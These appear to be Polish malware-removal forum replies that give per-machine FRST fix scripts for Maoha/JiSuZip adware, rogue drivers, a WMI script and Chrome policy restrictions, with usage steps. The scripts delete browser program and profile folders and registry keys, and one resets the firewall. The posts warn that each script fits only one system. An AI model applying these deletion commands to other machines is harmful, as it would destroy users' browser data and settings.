EndBatch: S3 SWDUMon; C:\Windows\system32\DRIVERS\SWDUMon.sys [25608 2017-06-16] (SlimWare Utilities, Inc.) S1 fburutqr; \??\C:\Windows\system32\drivers\fburutqr.sys [X] U0 msahci; system32\drivers\msahci.sys [X] U0 Partizan; system32\drivers\Partizan.sys [X] Task: {72040F41-1635-429B-8BDF-289B41800C08} - \Plejuphaniling -> Brak pliku Task: {7ED7A3CA-D46E-41B5-8FA6-6E5FAAB4D385} - \AVG EUpdate Task -> Brak pliku ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku HKU\S-1-5-21-2586129371-1797009435-415111422-1001\...\StartupApproved\StartupFolder: => "Wysyłanie do programu OneNote.lnk" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="" HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKU\S-1-5-21-2586129371-1797009435-415111422-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome SearchScopes: HKU\S-1-5-21-2586129371-1797009435-415111422-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-2586129371-1797009435-415111422-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = StartMenuInternet: IEXPLORE.EXE - iexplore.exe DeleteKey: HKCU\Software\Google DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Program Files (x86)\Google C:\Program Files (x86)\Mozilla Firefox C:\Users\Czesław\AppData\Local\Google C:\Users\Czesław\AppData\Local\Mozilla C:\Users\Czesław\AppData\Roaming\Mozilla C:\Users\Czesław\Downloads\FRST64.exe.r6z2jjp.partial C:\Users\Czesław\Downloads\RegCureProSetup_52fe7fda-917f-46a7-ba74-335c1dfaff72_.exe C:\Windows\system32\DRIVERS\SWDUMon.sys EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. W wyniku powyższego skryptu na Pulpicie powstanie folder "Chrome" z plikami zakładek i danych logowania. Zainstaluj Google Chrome i uruchom, by utworzył się nowy profil. Następnie zamknij Chrome i podmień korespondujące pliki w poniższej ścieżce tymi z katalogu "Chrome" na Pulpicie. Uruchom Chrome ponownie i sprawdź czy widać zakładki. C:\Users\Czesław\AppData\Local\Google\Chrome\User Data\Default 3. Zrób nowy log FRST z opcji Skanuj (Scan), z zaznaczonym polem Shortcut. Dołącz też plik fixlog.txt.

Jest tu więcej infekcji, nie tylko Maoha. Skrypt we WMI infekuje skróty przeglądarki w określonych odstępach czasu, są też zasady grupy ustawione blokujące określone funkcje Chrome. Działania do przeprowadzenia: 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: (Microsoft Corporation) C:\Windows\explorer.exe R2 JszipService; C:\Program Files (x86)\Maoha\JiSuZip\JszipSvc.exe [130072 2017-02-16] (深圳市猫哈网络科技发展有限公司) R2 mptpmdxm; C:\Windows\SysWow64\mptpmdxm.dll [460072 2017-06-14] () R1 cytdsk; C:\WINDOWS\System32\drivers\cytdsk.sys [195496 2017-06-13] () R1 JszipProtect; C:\Program Files (x86)\Maoha\JiSuZip\JsZipProtect64.sys [39256 2016-12-27] () R1 LanmaMaster; C:\WINDOWS\system32\drivers\lanmamaster.sys [2978920 2016-11-11] () [brak podpisu cyfrowego] R2 UefGdstor; C:\WINDOWS\system32\drivers\UefGdstor.sys [192552 2016-11-11] () R1 WiserIso; C:\WINDOWS\System32\Drivers\vcdrom.sys [25432 2016-12-27] () Task: {EE6EDC50-E002-43E5-855B-D16EE1FB9364} - System32\Tasks\CloneList => Rundll32.exe "C:\Program Files\CloneList\CloneList.dll",xkYjNSAWtNj ShellIconOverlayIdentifiers: [JzShlobj] -> {9A0700D2-920A-4E52-8697-9B5230C92612} => C:\Program Files (x86)\Maoha\JiSuZip\JZipExt.dll [2016-12-27] (深圳市猫哈网络科技发展有限公司) ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> Brak pliku WMI_ActiveScriptEventConsumer_ASEC: GroupPolicy: Ograniczenia - Chrome CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia HKU\S-1-5-21-646645915-3493183111-878668481-1001\Software\Microsoft\Internet Explorer\Main,Start Page = DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Program Files\CloneList C:\Program Files (x86)\Maoha C:\Program Files (x86)\UCBrowser C:\Program Files (x86)\WindowsTM C:\ProgramData\Cache C:\ProgramData\WinCacheData C:\ProgramData\Microsoft\Windows\Start Menu\Programs\极速压缩 C:\Users\lucca\AppData\Local\InstallationConfiguration.xml C:\Users\lucca\AppData\Local\installer.dat C:\Users\lucca\AppData\Local\test_db_cara.db C:\Users\lucca\AppData\Roaming\Nvu C:\Users\lucca\AppData\Roaming\Microsoft\Windows\Start Menu\IPCSearch.lnk C:\Users\lucca\AppData\Roaming\Microsoft\Windows\Start Menu\IPCSearcher.exe.lnk C:\Users\lucca\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Start Tor Browser.lnk C:\Users\lucca\Desktop\IPCSearch.lnk C:\WINDOWS\System32\drivers\cytdsk.sys C:\WINDOWS\system32\drivers\lanmamaster.sys C:\WINDOWS\system32\drivers\UefGdstor.sys C:\WINDOWS\System32\Drivers\vcdrom.sys C:\Windows\SysWow64\mptpmdxm.dll CMD: netsh advfirewall reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. W Google Chrome Ustawienia > karta Rozszerzenia > odinstaluj Tables. 3. Zrób nowy log FRST z opcji Skanuj (Scan), bez Shortcut. Dołącz też plik fixlog.txt oraz logi z folderu C:\AdwCleaner.

Czy po usuwaniu przy udziale skryptu FRST problemy nadal występują? Poprawki: 1. Czy na pewno Chrome było czyszczone wg wytycznych? Ja nadal widzę wpisy adware w konfiguracji. 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: S1 MpKsla6c1eb07; \??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{0FC4F30E-5CB4-4991-901C-BF3C85CFBC3E}\MpKsla6c1eb07.sys [X] Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Tym razem nie będzie restartu. Przedstaw wynikowy fixlog.txt.